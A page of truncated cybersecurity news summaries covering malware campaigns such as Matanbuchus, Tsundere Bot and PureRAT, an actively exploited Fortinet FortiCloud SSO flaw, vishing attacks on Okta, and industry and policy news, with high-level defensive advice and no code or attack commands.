Author: Staff Writer

Essential Insights Matanbuchus is resurfacing with refined tactics, using MSI files for stealthy delivery and avoiding detection by modifying components regularly. Attackers disguise MSI files as legitimate software, enabling the malware to silently install and establish command-and-control (C2) communication for further malicious activity. Continuous updates to the malware’s code, structure, and obfuscation techniques make static detection difficult, forcing analysts to focus on behavioral indicators instead of simple signatures. To defend against this evolving threat, organizations should enhance monitoring of MSI execution, outbound network activity, and employ behavior-based detection methods alongside threat intelligence. The Issue Matanbuchus, a stealthy malware, has resurfaced…

Quick Takeaways Federal authorities warn of a critical vulnerability in Fortinet FortiCloud SSO, allowing unauthorized access to devices linked to different accounts (CVE-2026-24858). Confirmed malicious activities include hackers altering firewall settings and creating unauthorized accounts to gain VPN access. Users who patched earlier vulnerabilities (CVE-2025-59718 and CVE-2025-59719) must upgrade again, as the new flaw is not protected by previous fixes. Fortinet disabled and later restored FortiCloud SSO access while advising users to upgrade to secure versions; around 10,000 vulnerable instances reported. Critical Vulnerability Exploited Federal authorities, along with security researchers, have issued urgent warnings about a significant flaw in Fortinet’s…

Essential Insights TA584, a sophisticated cybercriminal group, has expanded its attack toolkit with the Tsundere Bot malware, utilizing social engineering and sophisticated evasion tactics. Their campaigns have intensified in 2025, employing phishing emails impersonating trusted entities, with automation of malware deployment via a malware-as-a-service platform that leverages blockchain for communication. The malware’s infection process involves deceptive ClickFix techniques, fake CAPTCHA verifications, and remote PowerShell commands that automatically download and execute the malware, which can escalate to ransomware. Tsundere Bot features anti-analysis mechanisms, geographic restrictions, and advanced command-and-control methods, making detection and disruption increasingly challenging for security defenders. The Issue In…

Summary Points The U.S. CISA has issued a warning about a critical vulnerability (CVE-2026-24858) in Fortinet’s FortiCloud SSO, allowing attackers to hijack sessions and escalate privileges via authentication bypass. Exploits involve attackers compromising FortiCloud accounts, exploiting authentication flaws to access unrelated devices like FortiAnalyzer, FortiManager, FortiOS, or FortiProxy, enabling potential ransomware deployment. The flaw has been actively exploited in the wild, with threat actors scanning for exposed endpoints, gaining initial access, and pivoting to high-value targets, especially in zero-trust environments, escalating the risk. Fortinet recommends immediate updates to patched versions, disabling FortiCloud SSO if unnecessary, enforcing MFA, and monitoring for…

Essential Insights Cyberattackers increasingly exploit legitimate access and stolen credentials, with 97% of incidents involving passwords, highlighting a shift from hacking to misuse of existing accounts. Business-Email-Compromise (BEC) accounts for over 70% of attacks, often going undetected for weeks, with phishing as a common initial entry point. Ransomware remains a major threat, facilitated by Ransomware-as-a-Service and the sale of insider access, blurring lines between external and insider threats. Vulnerable industries such as manufacturing, construction, and logistics are most affected, typically through unprotected apps, insecure remote access, or phishing attacks. The Issue The Eye Security’s 2026 State of Incident Response Report…

Summary Points A Vietnamese cybercrime group is using AI-generated malicious code to conduct a widespread phishing campaign distributing PureRAT malware via fake job offers. The malware campaign involves sophisticated social engineering with phishing emails and ZIP archives mimicking legitimate employment opportunities from well-known companies. Researchers identified AI-created scripts in the malware featuring detailed Vietnamese comments and emoji symbols, indicating advanced, automated programming techniques. The malware establishes persistence through hidden directories, DLL sideloading, and registry modifications, while disguising malicious activity with legitimate-looking files and documents. Underlying Problem In December 2025, a Vietnamese cybercrime group launched a sophisticated phishing campaign using artificial…

Essential Insights New research from Silent Push reveals a large-scale, human-led identity theft campaign targeting Okta SSO and other platforms, primarily using vishing to bypass multi-factor authentication and gain persistent access. The SLSH group, linked to threats like Scattered Spider, LAPSUS$, and ShinyHunters, employs sophisticated live phishing panels to intercept credentials and MFA tokens in real-time during phone calls, enabling immediate access and lateral movement within organizations. Over the past month, targeted industries include technology, fintech, healthcare, real estate, energy, retail, legal, and more, with prominent organizations such as Atlassian, Moderna, Zillow, Halliburton, and Sonos among those affected. Silent Push…

Quick Takeaways Elimination of Security Attestation: The Trump administration has rescinded a required security attestation for federal software vendors, shifting accountability for product security back to individual agencies. Mixed Reactions: The cybersecurity community is divided, with some experts arguing this move undermines progress toward better security practices, while others see a risk-based approach as more effective. Potential Fragmentation: Without a standardized requirement, there may be inconsistent oversight across agencies, potentially complicating compliance for vendors and risking overall security improvements. Concern Over Security Impacts: Experts warn that relaxing oversight could weaken vendor accountability, endangering both government and private sector users who…

Essential Insights Strategic Appointments: The Chertoff Group has appointed cybersecurity leaders Michael Johnson, Sammy Migues, and John Steven as senior advisors to bolster its advisory services amidst growing cyber risks. Expertise and Innovation: The firm integrates top-tier private and governmental cybersecurity expertise to enhance practical guidance for clients across various industries facing complex technological challenges. Diverse Specializations: Johnson comes from Meta with extensive experience in FinTech security; Migues is renowned for his work on software security frameworks; and Steven has significant influence in application security and automation strategies. Enhanced Advisory Services: This expansion positions The Chertoff Group to deliver stronger…

Essential Insights Fortinet is experiencing a critical, actively exploited zero-day vulnerability (CVE-2026-24858) that allows attackers to bypass authentication and gain privileged access to multiple products, with some exploitation already occurring. The vulnerability affects several Fortinet products, including FortiAnalyzer, FortiManager, FortiOS, FortiProxy, and FortiWeb, and has a high CVSS score of 9.8; patches are not yet available. Attackers exploited this flaw by creating unauthorized accounts and reconfiguring firewalls, often targeting devices with FortiCloud SSO enabled, which many instances still have exposed online. Despite ongoing vulnerabilities and criticism over Fortinet’s delayed responses, security experts emphasize the importance of promptly applying best practices…